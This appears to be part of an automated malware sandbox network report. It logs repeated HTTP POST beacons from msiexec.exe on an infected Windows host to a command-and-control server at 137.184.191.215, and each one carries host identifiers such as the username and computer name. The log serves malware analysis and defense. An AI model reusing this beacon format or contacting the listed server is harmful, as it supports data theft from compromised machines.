                                8 | 192.168.2.4 | 49749 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:00.185600996 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:00.190479040 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:02.782263041 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.4 | 49750 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:02.928149939 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:02.933068991 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:05.519123077 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:03 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:05.519140959 CEST | 224 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:05.519151926 CEST | 1236 | IN
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:05.519161940 CEST | 142 | IN
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                10 | 192.168.2.4 | 49751 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:05.673099995 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:05.678112984 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:08.226331949 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:06 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                11 | 192.168.2.4 | 49752 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:08.382426977 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:08.387339115 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:10.927911997 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:08 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                12 | 192.168.2.4 | 49753 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:11.076231956 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:11.081114054 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:13.629993916 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:11 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:13.630017996 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:13.630032063 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                13          192.168.2.4  49754        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:13.772979975 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:13.777858973 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:16.314459085 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:14 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:16.314480066 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:16.314491034 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                14          192.168.2.4  49755        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:16.460316896 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:16.465295076 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:19.040237904 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:16 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:19.040257931 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:19.040275097 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                15          192.168.2.4  49756        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:19.194720030 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:19.199610949 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:21.852612019 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:19 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:21.852628946 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:21.852639914 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                16          192.168.2.4  49757        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:22.017584085 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:22.028390884 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:24.553879023 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:22 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:24.553898096 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:24.553910017 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                17          192.168.2.4  49758        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:24.885512114 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:24.890573025 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:27.506804943 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:25 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:27.506836891 CEST  1236               IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:27.506848097 CEST  366                IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                18          192.168.2.4  49759        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:27.774245977 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:27.779108047 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:30.424139977 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:28 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:30.424155951 CEST  224                IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:30.424168110 CEST | 1236 | IN | Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:30.424179077 CEST | 142 | IN | Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                19 | 192.168.2.4 | 49760 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:30.572695017 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:30.577567101 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:33.235300064 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:31 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                20 | 192.168.2.4 | 49761 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:33.396735907 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
